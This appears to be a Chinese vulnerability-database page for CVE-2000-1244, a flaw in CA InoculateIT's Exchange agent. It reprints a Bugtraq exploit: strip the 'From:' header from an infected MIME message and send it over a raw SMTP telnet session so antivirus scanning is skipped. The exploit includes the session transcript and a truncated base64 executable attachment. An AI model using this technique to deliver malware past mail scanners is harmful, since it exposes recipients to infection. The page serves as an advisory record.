Exchange Server病毒绕过漏洞

Exchange Server病毒绕过漏洞

漏洞ID 1106075 漏洞类型 未知
发布时间 2000-11-10 更新时间 2000-12-31
图片[1]-Exchange Server病毒绕过漏洞-安全小百科CVE编号 CVE-2000-1244
图片[2]-Exchange Server病毒绕过漏洞-安全小百科CNNVD-ID CNNVD-200012-196
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20401
https://www.securityfocus.com/bid/88392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-196
|漏洞详情
ExchangeServer中的ComputerAssociatesInoculateITAgent如果SMTP头丢失在”From”域中则不能识别电子邮件病毒附件,远程攻击者可以绕过病毒保护。
|漏洞EXP
source : http://www.securityfocus.com/bid/1935/info

InoculateIT 4.52 is a popular antivirus agent for Microsoft Exchange Servers.

A vulnerability exists in the InoculateIT Agent for MS Exchange that can allow a local attacker to pass a virus through both the agent and MS Exchange Server. There are reportedly numerous methods by which this can be accomplished, one of which is to remove the "From:" field in a infected message (MIME attachment included) and submit the message to the Exchange server. The Inoculate Agent will not detect the infected file when it is submitted in this manner. 

If different organizations are using MS Exchange Server and InoculateIT Agents (with MS IMC being used to send the messages) the following vulnerabilities can exist:

If a message is sent with only an infected file in the body of the message and no text, the Inoculate IT Agents will not detect the virus.

If a message contains embedded characters and an infected attachment, InoculateIT will not open the attachment for scanning.

InoculateIT only scans for messages destined for an Inbox folder. If a ruleset exists on the server whereby messages are directed to another mailbox, an infected file can bypass virus scanning.

1. Get a message containing any infected attached MIME encoded file. I
simply filtered out via EX to C:TurfDir sending from outside to EX;

2. Edit the file (I used MS Notepad.exe) and just remove the "From:
..." line from the SMTP header. Something like this:

Remove this line: From: Test <[email protected]>
To: Joe Bob <[email protected]>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA... 

3. Copy the Notepad content to clipboard;

4. Issue "telnet your_exsrvr 25" command:

220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<[email protected]>
250 OK - Recipient <[email protected]>
data
354 Send data. End with CRLF.CRLF

Here, paste from clipboard (Win2K, just a mouse right-click).
Something like this:

To: Joe Bob <[email protected]>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload;
name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA... 

250 OK
quit
221 closing connection

5. Message sent, CA's Agent will not detect the infected file.
|参考资料

来源:BUGTRAQ
名称:20001110CA’sInoculateITAgentforExchangeServer
链接:http://archives.neohapsis.com/archives/bugtraq/2000-11/0158.html

相关推荐: Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 – TelnetD

Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 – TelnetD 漏洞ID 1053380 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享